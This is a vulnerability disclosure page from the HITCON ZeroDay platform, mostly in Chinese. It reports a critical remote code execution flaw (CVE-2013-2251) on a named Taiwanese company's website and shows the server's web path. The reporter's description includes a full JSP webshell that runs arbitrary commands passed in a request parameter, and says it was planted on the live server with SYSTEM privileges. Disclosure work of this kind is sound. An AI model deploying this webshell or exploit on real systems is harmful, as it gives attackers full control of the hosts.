Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2022-00427
- 發信 Vendor: 惟昌企業股份有限公司
- Title: 惟昌企業股份有限公司
- Introduction: Remote Code Execution
處理狀態
目前狀態
公開
Last Update : 2022/08/30
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2022/06/30 09:30:41 : 新提交 (由 Noth 更新此狀態)
- 2022/06/30 09:34:09 : 新提交 (由 Noth 更新此狀態)
- 2022/06/30 09:37:41 : 新提交 (由 Noth 更新此狀態)
- 2022/06/30 09:43:18 : 新提交 (由 Noth 更新此狀態)
- 2022/06/30 09:50:20 : 新提交 (由 Noth 更新此狀態)
- 2022/06/30 09:52:51 : 新提交 (由 Noth 更新此狀態)
- 2022/06/30 17:03:57 : 新提交 (由 Noth 更新此狀態)
- 2022/07/01 15:14:32 : 新提交 (由 Noth 更新此狀態)
- 2022/07/02 07:55:53 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/07/07 17:36:10 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/07/07 17:36:10 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/07/07 17:36:10 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/08/30 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2022-00427
- 通報者:shen (Noth)
- 風險:嚴重
- 類型:遠端命令執行 (Remote Code Execution)
參考資料
攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://www.powermach.com.tw/
敘述
Domain(CVE-2013-2251) :
www.powermach.com.tw
WebPath: C:\Tomcat6\webapps\PMC\
測試上傳寫 txt :
直接寫個 Webshell 進去 :
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p;
if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
}
else{
p = Runtime.getRuntime().exec(request.getParameter("cmd"));
}
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>RCE :
arp -a :
看似是沒有防毒的,直接 system 權限,國內站點就不繼續深入內網。
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。